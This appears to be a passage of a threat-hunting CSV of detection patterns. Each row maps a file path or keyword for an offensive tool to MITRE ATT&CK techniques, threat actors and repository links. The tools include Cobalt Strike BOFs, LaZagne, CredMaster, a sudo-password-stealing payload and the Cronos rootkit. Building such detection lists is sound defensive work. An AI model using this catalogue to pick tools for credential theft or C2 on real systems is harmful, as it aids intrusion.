"*/createproxydll.sh*",".{0,1000}\/createproxydll\.sh.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*/createstager.py*",".{0,1000}\/createstager\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/cred_dump.rc*",".{0,1000}\/cred_dump\.rc.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8922","2233","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z" "*/Cred_Dump.sh*",".{0,1000}\/Cred_Dump\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/credBandit/*",".{0,1000}\/credBandit\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","228","26","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z" "*/creddump7*.py*",".{0,1000}\/creddump7.{0,1000}\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*/creddump7/*",".{0,1000}\/creddump7\/.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*/creddump7/*",".{0,1000}\/creddump7\/.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/Credentials/*.ccache*",".{0,1000}\/Credentials\/.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/credentials/enum_cred_store*",".{0,1000}\/credentials\/enum_cred_store.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*/credentials/enum_laps*",".{0,1000}\/credentials\/enum_laps.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*/Credentials/firefox_*.txt*",".{0,1000}\/Credentials\/firefox_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash 
script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/Credentials/msol_*.txt*",".{0,1000}\/Credentials\/msol_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/credentials/SudoSnatch*",".{0,1000}\/credentials\/SudoSnatch.{0,1000}","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*/credentials/wifigrabber*",".{0,1000}\/credentials\/wifigrabber.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*/CredEnum.c*",".{0,1000}\/CredEnum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/CredEnum.cna*",".{0,1000}\/CredEnum\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/CredEnum.h*",".{0,1000}\/CredEnum\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/creditcards.py*",".{0,1000}\/creditcards\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration 
simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/CredMaster.git*",".{0,1000}\/CredMaster\.git.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/credmaster.py*",".{0,1000}\/credmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/CredMaster-master.zip*",".{0,1000}\/CredMaster\-master\.zip.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/credmaster-success.txt*",".{0,1000}\/credmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/credmaster-validusers.txt*",".{0,1000}\/credmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential 
Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/CredPhisher/*",".{0,1000}\/CredPhisher\/.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/CredPrompt.exe*",".{0,1000}\/CredPrompt\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/CredPrompt/credprompt.c*",".{0,1000}\/CredPrompt\/credprompt\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 
- T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*/creds-*/creds.zip*",".{0,1000}\/creds\-.{0,1000}\/creds\.zip.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","5272","667","2024-04-29T16:57:49Z","2021-01-01T19:02:36Z" "*/creds-summary.nse*",".{0,1000}\/creds\-summary\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/crlfinjection.txt*",".{0,1000}\/crlfinjection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Cronos-Rootkit*",".{0,1000}\/Cronos\-Rootkit.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*/Cronos-Rootkit/*",".{0,1000}\/Cronos\-Rootkit\/.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*/Cronos-x64.zip*",".{0,1000}\/Cronos\-x64\.zip.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*/CrossC2.*",".{0,1000}\/CrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/CrossC2/*",".{0,1000}\/CrossC2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/CrossC2Kit*",".{0,1000}\/CrossC2Kit.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/CrossC2Kit/*",".{0,1000}\/CrossC2Kit\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/CrossC2-test*",".{0,1000}\/CrossC2\-test.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/CrossNet-Beta/*",".{0,1000}\/CrossNet\-Beta\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" 
"*/crunch-wordlist/*",".{0,1000}\/crunch\-wordlist\/.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/crypt0p3g/*",".{0,1000}\/crypt0p3g\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 